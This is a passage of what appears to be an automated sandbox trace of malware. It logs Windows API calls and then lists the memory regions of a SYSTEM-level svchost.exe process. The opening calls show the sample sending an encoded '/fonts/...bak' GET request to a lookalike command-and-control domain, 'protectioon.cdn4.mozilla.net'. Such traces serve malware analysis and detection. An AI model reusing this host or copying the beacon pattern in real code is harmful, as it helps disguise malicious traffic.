(lpString="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak") returned 350 [0261.786] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2bd) returned 0x2be08e0 [0261.786] InternetCanonicalizeUrlA (lpszUrl="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0261.786] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak", lpdwBufferLength=0x11ff040) returned 1 [0261.788] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0261.788] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0261.788] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0261.788] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0261.788] ResetEvent (hEvent=0x1c8) returned 1 [0261.788] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0261.788] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0261.789] SetEvent (hEvent=0x1c8) returned 1 [0261.789] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0261.789] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0261.789] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0261.790] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0261.790] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0261.790] ResetEvent (hEvent=0x1c8) returned 1 [0261.790] ResetEvent (hEvent=0x38c) returned 1 [0261.790] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0261.790] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0261.790] GetLastError () returned 0x3e5 [0261.790] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x102 [0261.790] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0261.790] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0261.790] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0261.795] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x0 [0261.795] SetEvent (hEvent=0x1c8) returned 1 [0261.795] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x38c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0271.798] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0271.798] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0271.798] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0271.798] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0271.798] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0271.798] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0271.798] CloseHandle (hObject=0x1c8) returned 1 [0271.799] CloseHandle (hObject=0x38c) returned 1 [0271.801] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fba8 | out: hHeap=0x2860000) returned 1 [0271.801] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be08e0 | out: hHeap=0x2860000) returned 1 [0271.802] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0271.803] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0271.803] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0271.803] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0271.804] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0271.804] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0271.804] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0271.804] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 4 os_tid = 0xef4 Thread: id = 79 os_tid = 0xf00 Thread: id = 80 os_tid = 0xf04 [0049.048] SetEvent (hEvent=0x1c4) returned 1 [0069.213] SetEvent (hEvent=0x1c4) returned 1 [0069.301] SetEvent (hEvent=0x1c8) returned 1 [0079.359] SetEvent (hEvent=0x1c4) returned 1 [0099.462] SetEvent (hEvent=0x1c4) returned 1 [0099.592] SetEvent (hEvent=0x1c8) returned 1 [0109.691] SetEvent (hEvent=0x1c4) returned 1 [0129.874] SetEvent (hEvent=0x1c8) returned 1 [0130.285] SetEvent (hEvent=0x38c) returned 1 [0140.343] SetEvent (hEvent=0x1c8) returned 1 [0160.448] SetEvent (hEvent=0x38c) returned 1 [0160.582] SetEvent (hEvent=0x3a0) returned 1 [0170.628] SetEvent (hEvent=0x38c) returned 1 [0190.721] SetEvent (hEvent=0x3a0) returned 1 [0190.809] SetEvent (hEvent=0x1c4) returned 1 [0200.861] SetEvent (hEvent=0x3a0) returned 1 [0220.979] SetEvent (hEvent=0x1c4) returned 1 [0221.114] SetEvent (hEvent=0x1c8) returned 1 [0231.158] SetEvent (hEvent=0x1c4) returned 1 [0251.339] SetEvent (hEvent=0x1c8) returned 1 [0251.748] SetEvent (hEvent=0x38c) returned 1 [0261.795] SetEvent (hEvent=0x1c8) returned 1 Thread: id = 81 os_tid = 0xf08 Thread: id = 89 os_tid = 0xf2c Thread: id = 90 os_tid = 0xf30 Thread: id = 91 os_tid = 0xf34 Thread: id = 93 os_tid = 0xf40 Thread: id = 100 os_tid = 0xf84 Thread: id = 103 os_tid = 0xfc0 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7818000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d9b2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 622 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 623 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 624 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 625 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 626 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 627 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 628 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 629 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 630 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 631 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 632 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 633 start_va = 0x130000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 634 start_va = 0x1a0000 end_va = 0x1aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 635 start_va = 0x1b0000 end_va = 0x1bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 636 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 637 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 638 start_va = 0x3c0000 end_va = 0x547fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 639 start_va = 0x550000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 640 start_va = 0x6e0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 641 start_va = 0x7a0000 end_va = 0x7a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 642 start_va = 0x7b0000 end_va = 0x7b9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 643 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 644 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 645 start_va = 0x7e0000 end_va = 0x7e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 646 start_va = 0x7f0000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 647 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 648 start_va = 0x810000 end_va = 0x829fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 649 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 650 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 651 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 652 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 653 start_va = 0x8e0000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 654 start_va = 0x960000 end_va = 0x961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 655 start_va = 0x970000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 656 start_va = 0x9f0000 end_va = 0x9f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 657 start_va = 0xa00000 end_va = 0xa01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 658 start_va = 0xa10000 end_va = 0xa13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 659 start_va = 0xa20000 end_va = 0xa2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 660 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 661 start_va = 0xab0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 662 start_va = 0xae0000 end_va = 0xae7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 663 start_va = 0xaf0000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 664 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 665 start_va = 0xb80000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 666 start_va = 0xc00000 end_va = 0xecefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 667 start_va = 0xed0000 end_va = 0xf35fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 668 start_va = 0xf40000 end_va = 0xf47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 669 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 670 start_va = 0xfd0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 671 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 672 start_va = 0x1000000 end_va = 0x1006fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 673 start_va = 0x1010000 end_va = 0x1017fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001010000" filename = "" Region: id = 674 start_va = 0x1020000 end_va = 0x1025fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 675 start_va = 0x1060000 end_va = 0x107bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 676 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 677 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 678 start_va = 0x10a0000 end_va = 0x10a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 679 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 680 start_va = 0x1130000 end_va = 0x1131fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 681 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 682 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 683 start_va = 0x1160000 end_va = 0x1167fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 684 start_va = 0x1170000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 685 start_va = 0x11f0000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 686 start_va = 0x1200000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 687 start_va = 0x1210000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 688 start_va = 0x1220000 end_va = 0x122ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 689 start_va = 0x1240000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 690 start_va = 0x12c0000 end_va = 0x12c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 691 start_va = 0x12d0000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 692 start_va = 0x12e0000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 693 start_va = 0x12f0000 end_va = 0x12f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 694 start_va = 0x1300000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 695 start_va = 0x1310000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 696 start_va = 0x1320000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 697 start_va = 0x13a0000 end_va = 0x13a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netcfgx.dll.mui" filename = "\\Windows\\System32\\en-US\\netcfgx.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netcfgx.dll.mui") Region: id = 698 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 699 start_va = 0x1430000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001430000" filename = "" Region: id = 700 start_va = 0x1440000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001440000" filename = "" Region: id = 701 start_va = 0x1450000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001450000" filename = "" Region: id = 702 start_va = 0x1460000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001460000" filename = "" Region: id = 703 start_va = 0x1470000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001470000" filename = "" Region: id = 704 start_va = 0x1480000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001480000" filename = "" Region: id = 705 start_va = 0x1490000 end_va = 0x1490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 706 start_va = 0x14a0000 end_va = 0x14a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 707 start_va = 0x14b0000 end_va = 0x14b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 708 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 709 start_va = 0x15e0000 end_va = 0x165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 710 start_va = 0x1690000 end_va = 0x170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 711 start_va = 0x1720000 end_va = 0x179ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 712 start_va = 0x17a0000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 713 start_va = 0x1820000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001820000" filename = "" Region: id = 714 start_va = 0x1830000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001830000" filename = "" Region: id = 715 start_va = 0x1840000 end_va = 0x184ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001840000" filename = "" 